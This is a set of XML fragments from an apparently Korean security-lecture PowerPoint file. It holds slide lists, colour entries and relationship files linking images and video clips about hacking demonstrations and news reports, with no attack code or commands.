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287" r:id="rId4"/>
    <p:sldId id="383" r:id="rId5"/>
    <p:sldId id="394" r:id="rId6"/>
    <p:sldId id="381" r:id="rId7"/>
    <p:sldId id="380" r:id="rId8"/>
    <p:sldId id="382" r:id="rId9"/>
    <p:sldId id="384" r:id="rId10"/>
    <p:sldId id="373" r:id="rId11"/>
    <p:sldId id="374" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="395" r:id="rId14"/>
    <p:sldId id="396" r:id="rId15"/>
    <p:sldId id="397" r:id="rId16"/>
    <p:sldId id="398" r:id="rId17"/>
    <p:sldId id="399" r:id="rId18"/>
    <p:sldId id="400" r:id="rId19"/>
    <p:sldId id="417" r:id="rId20"/>
    <p:sldId id="263" r:id="rId21"/>
    <p:sldId id="260" r:id="rId22"/>
    <p:sldId id="270" r:id="rId23"/>
    <p:sldId id="271" r:id="rId24"/>
    <p:sldId id="272" r:id="rId25"/>
    <p:sldId id="273" r:id="rId26"/>
    <p:sldId id="385" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="282" r:id="rId31"/>
    <p:sldId id="386" r:id="rId32"/>
    <p:sldId id="387" r:id="rId33"/>
    <p:sldId id="388" r:id="rId34"/>
    <p:sldId id="389" r:id="rId35"/>
    <p:sldId id="390" r:id="rId36"/>
    <p:sldId id="391" r:id="rId37"/>
    <p:sldId id="392" r:id="rId38"/>
    <p:sldId id="393" r:id="rId39"/>
    <p:sldId id="402" r:id="rId40"/>
    <p:sldId id="410" r:id="rId41"/>
    <p:sldId id="411" r:id="rId42"/>
    <p:sldId id="406" r:id="rId43"/>
    <p:sldId id="403" r:id="rId44"/>
    <p:sldId id="414" r:id="rId45"/>
    <p:sldId id="415" r:id="rId46"/>
    <p:sldId id="416" r:id="rId47"/>
    <p:sldId id="409" r:id="rId48"/>
    <p:sldId id="405" r:id="rId49"/>
    <p:sldId id="407" r:id="rId50"/>
    <p:sldId id="404" r:id="rId51"/>
    <p:sldId id="284" r:id="rId52"/>
    <p:sldId id="285" r:id="rId53"/>
    <p:sldId id="286" r:id="rId54"/>
    <p:sldId id="355" r:id="rId55"/>
    <p:sldId id="291" r:id="rId56"/>
    <p:sldId id="288" r:id="rId57"/>
    <p:sldId id="292" r:id="rId58"/>
    <p:sldId id="293" r:id="rId59"/>
    <p:sldId id="294" r:id="rId60"/>
    <p:sldId id="297" r:id="rId61"/>
    <p:sldId id="298" r:id="rId62"/>
    <p:sldId id="299" r:id="rId63"/>
    <p:sldId id="300" r:id="rId64"/>
    <p:sldId id="301" r:id="rId65"/>
    <p:sldId id="302" r:id="rId66"/>
    <p:sldId id="303" r:id="rId67"/>
    <p:sldId id="304" r:id="rId68"/>
    <p:sldId id="305" r:id="rId69"/>
    <p:sldId id="306" r:id="rId70"/>
    <p:sldId id="307" r:id="rId71"/>
    <p:sldId id="308" r:id="rId72"/>
    <p:sldId id="309" r:id="rId73"/>
    <p:sldId id="310" r:id="rId74"/>
    <p:sldId id="315" r:id="rId75"/>
    <p:sldId id="316" r:id="rId76"/>
    <p:sldId id="317" r:id="rId77"/>
    <p:sldId id="311" r:id="rId78"/>
    <p:sldId id="312" r:id="rId79"/>
    <p:sldId id="313" r:id="rId80"/>
    <p:sldId id="314" r:id="rId81"/>
    <p:sldId id="318" r:id="rId82"/>
    <p:sldId id="319" r:id="rId83"/>
    <p:sldId id="320" r:id="rId84"/>
    <p:sldId id="321" r:id="rId85"/>
    <p:sldId id="322" r:id="rId86"/>
    <p:sldId id="323" r:id="rId87"/>
    <p:sldId id="324" r:id="rId88"/>
    <p:sldId id="326" r:id="rId89"/>
    <p:sldId id="327" r:id="rId90"/>
    <p:sldId id="328" r:id="rId91"/>
    <p:sldId id="329" r:id="rId92"/>
    <p:sldId id="330" r:id="rId93"/>
    <p:sldId id="331" r:id="rId94"/>
    <p:sldId id="332" r:id="rId95"/>
    <p:sldId id="333" r:id="rId96"/>
    <p:sldId id="334" r:id="rId97"/>
    <p:sldId id="335" r:id="rId98"/>
    <p:sldId id="336" r:id="rId99"/>
    <p:sldId id="337" r:id="rId100"/>
    <p:sldId id="338" r:id="rId101"/>
    <p:sldId id="339" r:id="rId102"/>
    <p:sldId id="340" r:id="rId103"/>
    <p:sldId id="341" r:id="rId104"/>
    <p:sldId id="342" r:id="rId105"/>
    <p:sldId id="343" r:id="rId106"/>
    <p:sldId id="344" r:id="rId107"/>
    <p:sldId id="345" r:id="rId108"/>
    <p:sldId id="346" r:id="rId109"/>
    <p:sldId id="347" r:id="rId110"/>
    <p:sldId id="348" r:id="rId111"/>
    <p:sldId id="349" r:id="rId112"/>
    <p:sldId id="350" r:id="rId113"/>
    <p:sldId id="351" r:id="rId114"/>
    <p:sldId id="352" r:id="rId115"/>
    <p:sldId id="353" r:id="rId116"/>
    <p:sldId id="354" r:id="rId117"/>
    <p:sldId id="356" r:id="rId118"/>
    <p:sldId id="357" r:id="rId119"/>
    <p:sldId id="358" r:id="rId120"/>
    <p:sldId id="359" r:id="rId121"/>
    <p:sldId id="360" r:id="rId122"/>
    <p:sldId id="361" r:id="rId123"/>
    <p:sldId id="362" r:id="rId124"/>
    <p:sldId id="363" r:id="rId125"/>
    <p:sldId id="364" r:id="rId126"/>
    <p:sldId id="367" r:id="rId127"/>
    <p:sldId id="368" r:id="rId128"/>
    <p:sldId id="370" r:id="rId129"/>
    <p:sldId id="372" r:id="rId130"/>
    <p:sldId id="369" r:id="rId131"/>
    <p:sldId id="376" r:id="rId132"/>
    <p:sldId id="377" r:id="rId133"/>
    <p:sldId id="378" r:id="rId134"/>
    <p:sldId id="379" r:id="rId135"/>
    <p:sldId id="371" r:id="rId136"/>
    <p:sldId id="268" r:id="rId137"/>
    <p:sldId id="365" r:id="rId138"/>
    <p:sldId id="366" r:id="rId139"/>
    <p:sldId id="296" r:id="rId140"/>
    <p:sldId id="325" r:id="rId141"/>
    <p:sldId id="290" r:id="rId14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82F"/>
    <a:srgbClr val="007A37"/>
    <a:srgbClr val="009644"/>
    <a:srgbClr val="00B050"/>
    <a:srgbClr val="00863D"/>
    <a:srgbClr val="005024"/>
    <a:srgbClr val="F743BB"/>
    <a:srgbClr val="F7F8FC"/>
    <a:srgbClr val="DCE7ED"/>
    <a:srgbClr val="435D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47" d="100"/>
          <a:sy n="147" d="100"/>
        </p:scale>
        <p:origin x="120" y="5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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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2021-03-01</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14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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01.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.bmp"/><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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide53.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0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 Target="slide53.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05.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06.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.bmp"/><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167.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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08.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.bmp"/><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172.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.bmp"/><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178.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/><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183.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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slide" Target="slide53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.bmp"/><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115.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1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slide" Target="slide53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide117.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide119.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide118.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide52.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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slide" Target="slide117.xml"/><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6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><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slide" Target="slide2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="slide11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slide" Target="slide11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slide" Target="slide124.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide123.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="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slide" Target="slide122.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide125.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12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slide" Target="slide127.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide51.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide131.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide128.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.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slide" Target="slide126.xml"/><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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12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slide" Target="slide126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.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slide" Target="slide12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slide" Target="slide12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slide" Target="slide12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50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20mysql%20exploit.mp4" TargetMode="Externa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hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20Smarthome%20Hacking%20In%20Real%20World.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20&#51648;&#47280;&#52286;&#44592;%20&#53356;&#47001;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide138.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=IS3UpC121bI" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.mp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5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51453;&#44592;&#51204;&#50640;%20&#50508;&#50500;&#50556;%20&#54624;%20&#50669;&#49324;,%20&#48120;&#46300;&#50920;&#51060;%20&#54644;&#51204;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#51088;&#47561;&#45684;&#49828;%5d%20&#51064;&#53552;&#45367;%20&#51096;%20&#50504;%20&#46104;&#45716;%20&#21271;,%20&#50612;&#46523;&#44172;%20&#49464;&#44228;%20&#44275;&#44275;%20&#54644;&#53433;&#54624;&#44620;%20_%20YTN.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#54644;&#53433;%20vs%20&#54644;&#53433;%20(Hacker%20Vs%20Hacker)%20%5b&#45224;&#44284;&#48513;17%5d.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11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slide" Target="slide1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slide" Target="slide10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9"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slide" Target="slide10.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36.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.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1.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slide" Target="slide39.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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50.b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slide" Target="slide38.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide32.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide37.xml"/><Relationship Id="rId2"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31.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide34.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27.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 Target="slide43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide40.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44.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2.xml"/><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 Target="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 Target="slide2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slide" Target="slide2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jpe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 Target="slide126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide52.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52.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slide" Target="slide51.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide122.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide117.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide90.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide52.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide113.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide77.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide107.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide100.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 Target="slide53.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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.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 Target="slide53.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 Target="slide53.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6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9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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93.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.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gif"/><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99.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/></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79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><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bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.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 Target="slide53.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81.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82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.gif"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide83.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85.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86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.bmp"/><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128.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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 Target="slide53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.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8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 Target="slide53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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9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 Target="slide53.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9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140.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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 Target="slide53.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9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 Target="slide53.xml"/><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95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide53.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96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
